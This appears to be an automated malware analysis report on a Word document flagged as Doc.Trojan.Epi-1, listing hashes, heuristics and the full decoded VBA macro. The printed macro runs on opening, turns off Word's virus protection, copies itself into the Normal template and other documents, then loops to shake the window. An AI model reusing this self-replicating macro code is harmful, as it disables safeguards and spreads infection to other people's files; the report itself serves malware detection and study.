Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1940050c02437cf4…

MALICIOUS

Office (OLE)

Size: 56.0 KB
Created: 1999-05-20 22:41:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8f7f834cd2a8157263d83f8e4fe617a4
SHA-1: c3011a55db8b6a9dfc4b1ddf4a3201f15dfd23e1
SHA-256: 1940050c02437cf4d2a72ba900cc001e1ea7ec78fc04f1ef68b226f328a96946
Risk Score: 122

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains a VBA macro that triggers on Document_Open. This macro attempts to copy its own code into the Normal.dot template, suggesting an effort to achieve persistence or spread. The presence of the 'ClamAV: Doc.Trojan.Epi-1' heuristic and the embedded URL 'http://www.hustler.com' further indicate malicious intent, likely related to a phishing or malware distribution campaign.

Heuristics 4

  • ClamAV: Doc.Trojan.Epi-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Epi-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.hustler.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11149 bytes
SHA-256: 4386ba8d055e1a63e139a9cf17b1e594f4d562e0bdf9ac9b40bfc7f53445c88d
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Document_Open()

On Error Resume Next

Options.VirusProtection = False

EpilepticFit

End Sub

Private Sub EpilepticFit()
    If Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 1000, False, False) Then
        For I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
            lineofcode = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
            ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines I * 2, lineofcode
         Next I
        ' Save it
        If (Not ActiveDocument.ReadOnly) Then
            ActiveDocument.SaveAs AddToRecentFiles:=False
        End If
        
            
    ElseIf Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 1000, False, False) Then
            For I = 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
                lineofcode = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
                NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines I * 2, lineofcode
            Next I
            ' Save It
            NormalTemplate.Save
    Else
        'If the normal and active are infected now activate the payload
        Convulse
    End If
  
End Sub

Private Sub Convulse()
  
    Dim maxWidth As Long
    Dim maxHeight As Long
    maxWidth = ActiveWindow.Width
    maxHeight = ActiveWindow.Height
    
    maxHeight = maxHeight - 50
    maxWidth = maxWidth - 50
    If (ActiveWindow.WindowState <> wdWindowStateNormal) Then
            ActiveWindow.WindowState = wdWindowStateNormal
    End If
    ActiveWindow.Height = ActiveWindow.Height / 2
    ActiveWindow.Height = ActiveWindow.Height / 2
    Randomize
    While (True)
        
        
        
        If Int(2 * Rnd) = 1 Then
            If (ActiveWindow.Height > maxHeight) Then
               ActiveWindow.Height = ActiveWindow.Height - 50
            Else
                ActiveWindow.Height = ActiveWindow.Height + 50
            End If
            
            If (ActiveWindow.Width > maxWidth) Then
                ActiveWindow.Width = ActiveWindow.Width - 50
            Else
                ActiveWindow.Width = ActiveWindow.Width + 50
            End If
            
            If (ActiveWindow.VerticalPercentScrolled > 90) Then
                ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled - 10
            Else
                ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled + 10
            End If
        Else
         
            If (ActiveWindow.Height < 50) Then
                ActiveWindow.Height = ActiveWindow.Height - 50
            Else
                ActiveWindow.Height = ActiveWindow.Height + 50
            End If
           
            If (ActiveWindow.Width < 50) Then
                ActiveWindow.Width = ActiveWindow.Width - 50
            Else
                ActiveWindow.Width = ActiveWindow.Width + 50
            End If
               
            If (ActiveWindow.VerticalPercentScrolled < 10) Then
                ActiveWindow.VerticalPercentScrolled = ActiveWindowVerticalPercentScrolled + 10
            Else
                ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled - 10
            End If
        End If
        Start = Timer   ' Set start time.
        Do While Timer < Start + 0.2
            DoEvents    ' Yield to other processes.
        Loop
    Wend
End Sub

' Processing file: /opt/analyzer/scan_staging/403f97fae47d49a39f9f7d42789f93a6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 18
... (truncated)